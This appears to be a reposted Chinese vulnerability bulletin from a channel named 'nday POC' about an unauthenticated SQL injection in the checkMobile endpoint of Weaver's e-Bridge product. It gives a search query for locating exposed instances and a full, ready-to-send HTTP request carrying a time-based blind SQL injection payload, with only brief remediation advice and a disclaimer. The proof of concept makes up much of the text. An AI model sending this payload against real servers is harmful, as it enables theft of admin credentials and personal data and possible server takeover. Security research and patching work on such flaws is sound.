泛微-云桥e-Bridge checkMobile 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
app="泛微云桥e-Bridge"
POST /taste/checkMobile?company=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX&openid=1&source=1&userName=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 0
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、目前官方已发布安全补丁,建议受影响用户尽快升级至安全版本
https://www.weaver.com.cn/
原文始发于微信公众号(nday POC):泛微-云桥e-Bridge checkMobile SQL注入漏洞(XVE-2024-34435)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论